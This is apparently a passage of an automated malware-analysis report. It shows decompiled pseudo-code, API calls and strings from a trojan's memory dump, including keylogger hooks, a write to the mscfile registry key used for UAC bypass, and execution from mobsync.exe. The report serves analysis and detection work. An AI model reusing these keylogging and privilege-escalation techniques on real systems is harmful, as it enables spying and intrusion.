                      				void* _t221;
                      				signed int _t222;
                      				void* _t223;
                      				void* _t224;
                      				void* _t225;
                      				signed int _t226;
                      				void* _t227;
                      				void* _t228;
                      
                      				_t80 = _a8;
                      				_t224 = _t223 - 0x20;
                      				if(_t80 != 0) {
                      					_t208 = _a4;
                      					_t160 = 0;
                      					 *_t80 = 0;
                      					_t199 = 0;
                      					_t151 = 0;
                      					_v36 = 0;
                      					_v336.cAlternateFileName = 0;
                      					_v28 = 0;
                      					__eflags =  *_t208;
                      					if( *_t208 == 0) {
                      						L9:
                      						_v12 = _v12 & 0x00000000;
                      						_t82 = _t151 - _t199;
                      						_v8 = _t160;
                      						_t191 = (_t82 >> 2) + 1;
                      						__eflags = _t151 - _t199;
                      						_v16 = (_t82 >> 2) + 1;
                      						asm("sbb esi, esi");
                      						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                      						__eflags = _t210;
                      						if(_t210 != 0) {
                      							_t197 = _t199;
                      							_t158 = _t160;
                      							do {
                      								_t184 =  *_t197;
                      								_t17 = _t184 + 1; // 0x1
                      								_v8 = _t17;
                      								do {
                      									_t143 =  *_t184;
                      									_t184 = _t184 + 1;
                      									__eflags = _t143;
                      								} while (_t143 != 0);
                      								_t158 = _t158 + 1 + _t184 - _v8;
                      								_t197 = _t197 + 4;
                      								_t145 = _v12 + 1;
                      								_v12 = _t145;
                      								__eflags = _t145 - _t210;
                      							} while (_t145 != _t210);
                      							_t191 = _v16;
                      							_v8 = _t158;
                      							_t151 = _v336.cAlternateFileName;
                      						}
                      						_t211 = E0077CF23(_t191, _v8, 1);
                      						_t225 = _t224 + 0xc;
                      						__eflags = _t211;
                      						if(_t211 != 0) {
                      							_t87 = _t211 + _v16 * 4;
                      							_v20 = _t87;
                      							_t192 = _t87;
                      							_v16 = _t87;
                      							__eflags = _t199 - _t151;
                      							if(_t199 == _t151) {
                      								L23:
                      								_t200 = 0;
                      								__eflags = 0;
                      								 *_a8 = _t211;
                      								goto L24;
                      							} else {
                      								_t93 = _t211 - _t199;
                      								__eflags = _t93;
                      								_v24 = _t93;
                      								do {
                      									_t163 =  *_t199;
                      									_v12 = _t163 + 1;
                      									do {
                      										_t95 =  *_t163;
                      										_t163 = _t163 + 1;
                      										__eflags = _t95;
                      									} while (_t95 != 0);
                      									_t164 = _t163 - _v12;
                      									_t35 = _t164 + 1; // 0x1
                      									_t96 = _t35;
                      									_push(_t96);
                      									_v12 = _t96;
                      									_t100 = E0078D309(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                      									_t225 = _t225 + 0x10;
                      									__eflags = _t100;
                      									if(_t100 != 0) {
                      										_push(0);
                      										_push(0);
                      										_push(0);
                      										_push(0);
                      										_push(0);
                      										E0077698A();
                      										asm("int3");
                      										_t221 = _t225;
                      										_push(_t164);
                      										_t165 = _v64;
                      										_t47 = _t165 + 1; // 0x1
                      										_t193 = _t47;
                      										do {
                      											_t103 =  *_t165;
                      											_t165 = _t165 + 1;
                      											__eflags = _t103;
                      										} while (_t103 != 0);
                      										_push(_t199);
                      										_t202 = _a8;
                      										_t167 = _t165 - _t193 + 1;
                      										_v12 = _t167;
                      										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                      										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                      											_push(_t151);
                      											_t50 = _t202 + 1; // 0x1
                      											_t154 = _t50 + _t167;
                      											_t213 = E0077F348(_t167, _t154, 1);
                      											_t169 = _t211;
                      											__eflags = _t202;
                      											if(_t202 == 0) {
                      												L34:
                      												_push(_v12);
                      												_t154 = _t154 - _t202;
                      												_t108 = E0078D309(_t169, _t213 + _t202, _t154, _v0);
                      												_t226 = _t225 + 0x10;
                      												__eflags = _t108;
                      												if(__eflags != 0) {
                      													goto L37;
                      												} else {
                      													_t137 = E00786D38(_a12, __eflags, _t213);
                      													E007801F5(0);
                      													_t139 = _t137;
                      													goto L36;
                      												}
                      											} else {
                      												_push(_t202);
                      												_t140 = E0078D309(_t169, _t213, _t154, _a4);
                      												_t226 = _t225 + 0x10;
                      												__eflags = _t140;
                      												if(_t140 != 0) {
                      													L37:
                      													_push(0);
                      													_push(0);
                      													_push(0);
                      													_push(0);
                      													_push(0);
                      													E0077698A();
                      													asm("int3");
                      													_push(_t221);
                      													_t222 = _t226;
                      													_t227 = _t226 - 0x150;
                      													_t111 =  *0x7aa00c; // 0x67a7e35e
                      													_v116 = _t111 ^ _t222;
                      													_t170 = _v100;
                      													_push(_t154);
                      													_t155 = _v104;
                      													_push(_t213);
                      													_t214 = _v96;
                      													_push(_t202);
                      													_v440 = _t214;
                      													while(1) {
                      														__eflags = _t170 - _t155;
                      														if(_t170 == _t155) {
                      															break;
                      														}
                      														_t113 =  *_t170;
                      														__eflags = _t113 - 0x2f;
                      														if(_t113 != 0x2f) {
                      															__eflags = _t113 - 0x5c;
                      															if(_t113 != 0x5c) {
                      																__eflags = _t113 - 0x3a;
                      																if(_t113 != 0x3a) {
                      																	_t170 = E0078F5C0(_t155, _t170);
                      																	continue;
                      																}
                      															}
                      														}
                      														break;
                      													}
                      													_t194 =  *_t170;
                      													__eflags = _t194 - 0x3a;
                      													if(_t194 != 0x3a) {
                      														L47:
                      														_t203 = 0;
                      														__eflags = _t194 - 0x2f;
                      														if(_t194 == 0x2f) {
                      															L51:
                      															_t115 = 1;
                      															__eflags = 1;
                      														} else {
                      															__eflags = _t194 - 0x5c;
                      															if(_t194 == 0x5c) {
                      																goto L51;
                      															} else {
                      																__eflags = _t194 - 0x3a;
                      																if(_t194 == 0x3a) {
                      																	goto L51;
                      																} else {
                      																	_t115 = 0;
                      																}
                      															}
                      														}
                      														asm("sbb eax, eax");
                      														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                      														E00771F00(_t203,  &_v336, _t203, 0x140);
                      														_t228 = _t227 + 0xc;
                      														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                      														_t123 = _v340;
                      														__eflags = _t215 - 0xffffffff;
                      														if(_t215 != 0xffffffff) {
                      															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                      															__eflags = _t174;
                      															_v348 = _t174 >> 2;
                      															do {
                      																__eflags = _v336.cFileName - 0x2e;
                      																if(_v336.cFileName != 0x2e) {
                      																	L64:
                      																	_push(_t123);
                      																	_push(_v344);
                      																	_t123 =  &(_v336.cFileName);
                      																	_push(_t155);
                      																	_push(_t123);
                      																	L28();
                      																	_t228 = _t228 + 0x10;
                      																	__eflags = _t123;
                      																	if(_t123 != 0) {
                      																		goto L54;
                      																	} else {
                      																		goto L65;
                      																	}
                      																} else {
                      																	_t178 = _v291;
                      																	__eflags = _t178;
                      																	if(_t178 == 0) {
                      																		goto L65;
                      																	} else {
                      																		__eflags = _t178 - 0x2e;
                      																		if(_t178 != 0x2e) {
                      																			goto L64;
                      																		} else {
                      																			__eflags = _v290;
                      																			if(_v290 == 0) {
                      																				goto L65;
                      																			} else {
                      																				goto L64;
                      																			}
                      																		}
                      																	}
                      																}
                      																goto L58;
                      																L65:
                      																_t128 = FindNextFileA(_t215,  &_v336);
                      																__eflags = _t128;
                      																_t123 = _v340;
                      															} while (_t128 != 0);
                      															_t195 =  *_t123;
                      															_t179 = _v348;
                      															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                      															__eflags = _t179 - _t131;
                      															if(_t179 != _t131) {
                      																E0077AF20(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00786951);
                      															}
                      														} else {
                      															_push(_t123);
                      															_push(_t203);
                      															_push(_t203);
                      															_push(_t155);
                      															L28();
                      															L54:
                      															_t203 = _t123;
                      														}
                      														__eflags = _t215 - 0xffffffff;
                      														if(_t215 != 0xffffffff) {
                      															FindClose(_t215);
                      														}
                      													} else {
                      														__eflags = _t170 -  &(_t155[1]);
                      														if(_t170 ==  &(_t155[1])) {
                      															goto L47;
                      														} else {
                      															_push(_t214);
                      															_push(0);
                      															_push(0);
                      															_push(_t155);
                      															L28();
                      														}
                      													}
                      													L58:
                      													__eflags = _v16 ^ _t222;
                      													return E0076FD1B(_v16 ^ _t222);
                      												} else {
                      													goto L34;
                      												}
                      											}
                      										} else {
                      											_t139 = 0xc;
                      											L36:
                      											return _t139;
                      										}
                      									} else {
                      										goto L22;
                      									}
                      									goto L68;
                      									L22:
                      									_t196 = _v16;
                      									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                      									_t199 = _t199 + 4;
                      									_t192 = _t196 + _v12;
                      									_v16 = _t196 + _v12;
                      									__eflags = _t199 - _t151;
                      								} while (_t199 != _t151);
                      								goto L23;
                      							}
                      						} else {
                      							_t200 = _t199 | 0xffffffff;
                      							L24:
                      							E007801F5(0);
                      							goto L25;
                      						}
                      					} else {
                      						while(1) {
                      							_v8 = 0x3f2a;
                      							_v6 = _t160;
                      							_t147 = E0078F580( *_t208,  &_v8);
                      							__eflags = _t147;
                      							if(_t147 != 0) {
                      								_push( &_v36);
                      								_push(_t147);
                      								_push( *_t208);
                      								L38();
                      								_t224 = _t224 + 0xc;
                      							} else {
                      								_t147 =  &_v36;
                      								_push(_t147);
                      								_push(0);
                      								_push(0);
                      								_push( *_t208);
                      								L28();
                      								_t224 = _t224 + 0x10;
                      							}
                      							_t200 = _t147;
                      							__eflags = _t200;
                      							if(_t200 != 0) {
                      								break;
                      							}
                      							_t208 = _t208 + 4;
                      							_t160 = 0;
                      							__eflags =  *_t208;
                      							if( *_t208 != 0) {
                      								continue;
                      							} else {
                      								_t151 = _v336.cAlternateFileName;
                      								_t199 = _v36;
                      								goto L9;
                      							}
                      							goto L68;
                      						}
                      						L25:
                      						E00786D13( &_v36);
                      						_t91 = _t200;
                      						goto L26;
                      					}
                      				} else {
                      					_t148 = E0077A504();
                      					_t219 = 0x16;
                      					 *_t148 = _t219;
                      					E0077695D();
                      					_t91 = _t219;
                      					L26:
                      					return _t91;
                      				}
                      				L68:
                      			}

                      APIs
                      • _strpbrk.LIBCMT ref: 007869B8
                      • _free.LIBCMT ref: 00786AD5
                        • Part of subcall function 0077698A: IsProcessorFeaturePresent.KERNEL32(00000017,0077695C,?,?,?,?,?,00000000,?,?,0077697C,00000000,00000000,00000000,00000000,00000000), ref: 0077698C
                        • Part of subcall function 0077698A: GetCurrentProcess.KERNEL32(C0000417), ref: 007769AE
                        • Part of subcall function 0077698A: TerminateProcess.KERNEL32(00000000), ref: 007769B5
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                      • String ID: *?$.
                      • API String ID: 2812119850-3972193922
                      • Opcode ID: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
                      • Instruction ID: d9ae3cbe0b6eb84258921703b1d610f99df36246fad30c61beb2967e0e3c89a4
                      • Opcode Fuzzy Hash: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
                      • Instruction Fuzzy Hash: E851B375E40109EFDF14EFA8C841AADBBB5EF48314F24C16DE554E7340E679AE018B50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E0075576E(void* __ecx, void* __edx, void* __eflags) {
                      				char _v1048;
                      				char _v1056;
                      				char _v1092;
                      				void* _v1096;
                      				char _v1112;
                      				char _v1120;
                      				void* _v1124;
                      				void* _v1136;
                      				char _v1144;
                      				char _v1152;
                      				char _v1156;
                      				void* _v1160;
                      				char _v1184;
                      				char _v1200;
                      				void* _v1204;
                      				char _v1224;
                      				char _v1232;
                      				void* __ebx;
                      				void* __edi;
                      				void* __ebp;
                      				intOrPtr* _t39;
                      				void* _t54;
                      				void* _t57;
                      				void* _t60;
                      				void* _t67;
                      				void* _t73;
                      				char* _t84;
                      				char* _t86;
                      				void* _t120;
                      				void* _t121;
                      				void* _t123;
                      				intOrPtr* _t124;
                      				signed int _t128;
                      				void* _t130;
                      
                      				_t133 = __eflags;
                      				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
                      				_t121 = __ecx;
                      				_t74 = __edx;
                      				E007430A6(__edx,  &_v1184, E0074427F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
                      				E00741EF0();
                      				E00754906( &_v1120, __edx, __eflags, 0);
                      				_t84 =  &_v1120;
                      				_t39 =  *0x7abb04(E00741F95(_t84), E00742489(), _t120, _t123, _t73);
                      				_t124 = _t39;
                      				E0075441B( &_v1144, _t124);
                      				_t86 = L"image/png";
                      				E00754C72(_t86,  &_v1112);
                      				E00754493(E00741EEB( &_v1200),  &_v1152, _t43,  &_v1112);
                      				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
                      				if( *((char*)(E00741F95(E00741E49(0x7ac578,  &_v1112, _t133, 0x1b)))) == 1) {
                      					E007420D5(__edx,  &_v1224);
                      					_t54 = E007579DC(E00741EEB( &_v1200),  &_v1224);
                      					_t135 = _t54;
                      					if(_t54 != 0) {
                      						DeleteFileW(E00741EEB( &_v1200));
                      						_t57 = E00742489();
                      						E00745A7C( &_v1048, E00741F95(0x7ac560), _t57);
                      						_t60 = E00742489();
                      						E00745BA4(_t74,  &_v1056,  &_v1224,  &_v1184, E00741F95( &_v1232), _t60);
                      						E007430A6(_t74,  &_v1120, E0074427F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
                      						E00741EF0();
                      						_t67 = E00741EEB( &_v1120);
                      						E007420EC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
                      						E00757A4E(_t67);
                      						E00741EF0();
                      						E00741FC7();
                      					}
                      					_t48 = E00741FC7();
                      				}
                      				E00754441(_t48,  &_v1152);
                      				E00741FC7();
                      				return E00741EF0();
                      			}

                      APIs
                        • Part of subcall function 00754906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00754921
                        • Part of subcall function 00754906: CreateCompatibleDC.GDI32(00000000), ref: 0075492D
                        • Part of subcall function 0075441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00754431
                        • Part of subcall function 00754493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 007544A4
                        • Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9
                      • DeleteFileW.KERNEL32(00000000,0000001B), ref: 00755858
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CreateFile$GdipImage$CompatibleDeleteFromLoadSaveStream
                      • String ID: dat$image/png$png
                      • API String ID: 4253173196-186023265
                      • Opcode ID: 94b903f81330c321db6f7562441bb87ca0a1047cb5fe3583f4264efb0ca79539
                      • Instruction ID: 400bea66b6ec74738519b66d65cc13ee0184b4037a6f4719bda14e07fde234a8
                      • Opcode Fuzzy Hash: 94b903f81330c321db6f7562441bb87ca0a1047cb5fe3583f4264efb0ca79539
                      • Instruction Fuzzy Hash: 8A418475508340DBC314F760D85AEEFB7A9AF91311F804A2DF846571A2EF386A4DC692
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E0077CC8A(void* __ecx, void* __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				void* _v12;
                      				char _v16;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t36;
                      				struct HINSTANCE__* _t37;
                      				struct HINSTANCE__* _t43;
                      				intOrPtr* _t44;
                      				intOrPtr* _t45;
                      				CHAR* _t49;
                      				struct HINSTANCE__* _t50;
                      				void* _t52;
                      				struct HINSTANCE__* _t55;
                      				intOrPtr* _t59;
                      				struct HINSTANCE__* _t64;
                      				intOrPtr _t65;
                      
                      				_t52 = __ecx;
                      				if(_a4 == 2 || _a4 == 1) {
                      					E007872D9(_t52);
                      					GetModuleFileNameA(0, 0x7ab3c8, 0x104);
                      					_t49 =  *0x7aba3c; // 0x2d134d8
                      					 *0x7aba44 = 0x7ab3c8;
                      					if(_t49 == 0 ||  *_t49 == 0) {
                      						_t49 = 0x7ab3c8;
                      					}
                      					_v8 = 0;
                      					_v16 = 0;
                      					E0077CDAE(_t52, _t49, 0, 0,  &_v8,  &_v16);
                      					_t64 = E0077CF23(_v8, _v16, 1);
                      					if(_t64 != 0) {
                      						E0077CDAE(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                      						if(_a4 != 1) {
                      							_v12 = 0;
                      							_push( &_v12);
                      							_t50 = E00786DF4(_t49, 0, _t64, _t64);
                      							if(_t50 == 0) {
                      								_t59 = _v12;
                      								_t55 = 0;
                      								_t36 = _t59;
                      								if( *_t59 == 0) {
                      									L15:
                      									_t37 = 0;
                      									 *0x7aba30 = _t55;
                      									_v12 = 0;
                      									_t50 = 0;
                      									 *0x7aba34 = _t59;
                      									L16:
                      									E007801F5(_t37);
                      									_v12 = 0;
                      									goto L17;
                      								} else {
                      									goto L14;
                      								}
                      								do {
                      									L14:
                      									_t36 = _t36 + 4;
                      									_t55 =  &(_t55->i);
                      								} while ( *_t36 != 0);
                      								goto L15;
                      							}
                      							_t37 = _v12;
                      							goto L16;
                      						}
                      						 *0x7aba30 = _v8 - 1;
                      						_t43 = _t64;
                      						_t64 = 0;
                      						 *0x7aba34 = _t43;
                      						goto L10;
                      					} else {
                      						_t44 = E0077A504();
                      						_push(0xc);
                      						_pop(0);
                      						 *_t44 = 0;
                      						L10:
                      						_t50 = 0;
                      						L17:
                      						E007801F5(_t64);
                      						return _t50;
                      					}
                      				} else {
                      					_t45 = E0077A504();
                      					_t65 = 0x16;
                      					 *_t45 = _t65;
                      					E0077695D();
                      					return _t65;
                      				}
                      			}

                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0077CCCA
                      • _free.LIBCMT ref: 0077CD95
                      • _free.LIBCMT ref: 0077CD9F
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Windows\SysWOW64\mobsync.exe
                      • API String ID: 2506810119-2325505231
                      • Opcode ID: a586464b1e4140fdb0f4b4383b246a190249612c2b0b0b823a82584187188dd1
                      • Instruction ID: 301f5936ab906c8860a55e2f18b181d9bf9e3356a4f1283efb09a3b5cd6c53f5
                      • Opcode Fuzzy Hash: a586464b1e4140fdb0f4b4383b246a190249612c2b0b0b823a82584187188dd1
                      • Instruction Fuzzy Hash: F6316175B00258EFDF22DF99D88599EBFBCEB89350B10806AF50997211DB784E44DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E0074951E(void* __ebx, struct HHOOK__** __ecx) {
                      				char _v28;
                      				void* __edi;
                      				struct HHOOK__** _t29;
                      				void* _t30;
                      				void* _t31;
                      
                      				_t19 = __ebx;
                      				_t29 = __ecx;
                      				_t35 =  *((char*)(__ecx + 0x4a));
                      				if( *((char*)(__ecx + 0x4a)) == 0) {
                      					__eflags = 0;
                      					return 0;
                      				}
                      				_t28 = "Online Keylogger Stopped";
                      				E00742084(__ebx,  &_v28, "Online Keylogger Stopped");
                      				_t31 = _t30 - 0x18;
                      				E007572DA(_t31,  &_v28);
                      				E00749634(__ebx, _t29, _t35);
                      				E00741FC7();
                      				_t32 = _t31 - 0x18;
                      				E00742084(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
                      				E00742084(_t19, _t32 - 0x18, "[Info]");
                      				E00756C80(_t19, _t28);
                      				_t29[0x12] = 0;
                      				CloseHandle(_t29[0xf]);
                      				if(_t29[0x12] == 0 &&  *_t29 != 0) {
                      					UnhookWindowsHookEx( *_t29);
                      					 *_t29 =  *_t29 & 0x00000000;
                      				}
                      				return 1;
                      			}

                      APIs
                        • Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
                        • Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
                        • Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED
                        • Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A
                      • CloseHandle.KERNEL32(?), ref: 00749581
                      • UnhookWindowsHookEx.USER32 ref: 00749594
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                      • String ID: Online Keylogger Stopped$[Info]
                      • API String ID: 3650414481-1913360614
                      • Opcode ID: 73ad4bf79a49c977020416a675f408c9bf440ed0b4013bf0813a03fd203d3525
                      • Instruction ID: d9137c4eb59af7a010835c96811311df461bd8e6bfd273ef8effb20280091111
                      • Opcode Fuzzy Hash: 73ad4bf79a49c977020416a675f408c9bf440ed0b4013bf0813a03fd203d3525
                      • Instruction Fuzzy Hash: DE012431A002009BDB267768D80F7BFBBB59B42310FD0005DFA8142192EFAD186BC3D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0074C119
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Exception@8Throw
                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                      • API String ID: 2005118841-1866435925
                      • Opcode ID: 7cbb648426846c97f0823c96b1823e7cafe5ca021b0a8a7b2c8783e863c508aa
                      • Instruction ID: a3b7955fd667a2d1ab013d518b64c7696cfc01801cf04945db09ba674612ea19
                      • Opcode Fuzzy Hash: 7cbb648426846c97f0823c96b1823e7cafe5ca021b0a8a7b2c8783e863c508aa
                      • Instruction Fuzzy Hash: A101D1B098120CFAEB91EA50CC17FBA73689B54740F90C418BA12590D3DB6DA902C662
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00750A30(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                      				void* _v12;
                      				char _v1040;
                      				long _t17;
                      
                      				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
                      					L3:
                      					return 0;
                      				}
                      				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
                      				RegCloseKey(_v12);
                      				if(_t17 != 0) {
                      					goto L3;
                      				}
                      				E00745A7C( &_v1040, _a16, _a20);
                      				E00745B03( &_v1040, _a8, _a12);
                      				return 1;
                      			}

                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00750A4C
                      • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00750A65
                      • RegCloseKey.ADVAPI32(00000000), ref: 00750A70
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: origmsc
                      • API String ID: 3677997916-68016026
                      • Opcode ID: 30febd10602b9f4b81ddabf227af30c110e75e057bd6454789b51388825f270a
                      • Instruction ID: 5542fd894884b8591e70dd5342a0991bdb111662c91311fe0839a0e321caefd4
                      • Opcode Fuzzy Hash: 30febd10602b9f4b81ddabf227af30c110e75e057bd6454789b51388825f270a
                      • Instruction Fuzzy Hash: BF014B3580022DFBCF219FA5DC49DEB7F29EF05750F008151BE0862061E7758A69DBE0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 63%
                      			E0075094E(void* __ecx) {
                      				void* _v8;
                      				int _v12;
                      				char _v2060;
                      				void* _t17;
                      				void* _t21;
                      
                      				_v12 = 0x400;
                      				_t21 = __ecx;
                      				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
                      					_push(0x79f724);
                      				} else {
                      					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
                      					RegCloseKey(_v8);
                      					_push( &_v2060);
                      				}
                      				E0074427F(_t17, _t21);
                      				return _t21;
                      			}

                      APIs
                      • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,007AC578,?), ref: 00750978
                      • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00750993
                      • RegCloseKey.ADVAPI32(00000000), ref: 0075099C
                      Strings
                      • http\shell\open\command, xrefs: 0075096E
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: http\shell\open\command
                      • API String ID: 3677997916-1487954565
                      • Opcode ID: 0ed65a816075ce9e8809e83240ee1c3ee8d794f77829b505d5fc50e5e89be960
                      • Instruction ID: 80dbcd156e5c481761afa856e28d1d5251c25b1e1a535ae7f5334ad534feefe7
                      • Opcode Fuzzy Hash: 0ed65a816075ce9e8809e83240ee1c3ee8d794f77829b505d5fc50e5e89be960
                      • Instruction Fuzzy Hash: C8F0C275600108FBEB20DA99EC09EDFBBBCEB84B01F1081A6B945E2111DBB45F5587A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00750B4C(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
                      				void* _v8;
                      				signed int _t17;
                      				long _t20;
                      				signed int _t22;
                      				signed int _t23;
                      
                      				_push(__ecx);
                      				_push(_t22);
                      				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
                      					_t23 = 0;
                      				} else {
                      					_t17 = E00742489();
                      					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E00741EEB( &_a8), 2 + _t17 * 2);
                      					RegCloseKey(_v8);
                      					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
                      				}
                      				E00741EF0();
                      				return _t23;
                      			}

                      APIs
                      • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,007ABB08), ref: 00750B57
                      • RegSetValueExW.ADVAPI32(007ABB08,0079F724,00000000,00000000,00000000,00000000,0079F724,?,80000001,?,00746020,0079F724,007ABB08), ref: 00750B86
                      • RegCloseKey.ADVAPI32(007ABB08,?,80000001,?,00746020,0079F724,007ABB08), ref: 00750B91
                      Strings
                      • Software\Classes\mscfile\shell\open\command, xrefs: 00750B55
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseCreateValue
                      • String ID: Software\Classes\mscfile\shell\open\command
                      • API String ID: 1818849710-505396733
                      • Opcode ID: 9a4f683064e69e4225ecb58df2c8297c1d9046759c9d9fea0d3eb7b29c4dc773
                      • Instruction ID: c0b3d1c5b4dc1482e3fdd681d1af8349ce1cc5bdc0cfd7fe3e40a7ed02e07804
                      • Opcode Fuzzy Hash: 9a4f683064e69e4225ecb58df2c8297c1d9046759c9d9fea0d3eb7b29c4dc773
                      • Instruction Fuzzy Hash: 12F0A972400118FBDF00AFA8EC4AEEA376DEB04751F508615BC0596120EB399F18DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E007413AD() {
                      				_Unknown_base(*)()* _t2;
                      
                      				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                      				 *0x7ac5e4 = _t2;
                      				return _t2;
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 007413B7
                      • GetProcAddress.KERNEL32(00000000), ref: 007413BE
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: GetCursorInfo$User32.dll
                      • API String ID: 1646373207-2714051624
                      • Opcode ID: dfec107a9365f7cea26858f05c9506deeb647ff147d17920e462b70cbae97c3f
                      • Instruction ID: af9a85911abc47755b7f6ee536c405b7a52868883d66ace9a53b50f9aebee518
                      • Opcode Fuzzy Hash: dfec107a9365f7cea26858f05c9506deeb647ff147d17920e462b70cbae97c3f
                      • Instruction Fuzzy Hash: DCB092F5982600FF86016BA4AD0D8093AB4F6D6B023108152B501C21A0CB7C81019F18
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00741468() {
                      				_Unknown_base(*)()* _t2;
                      
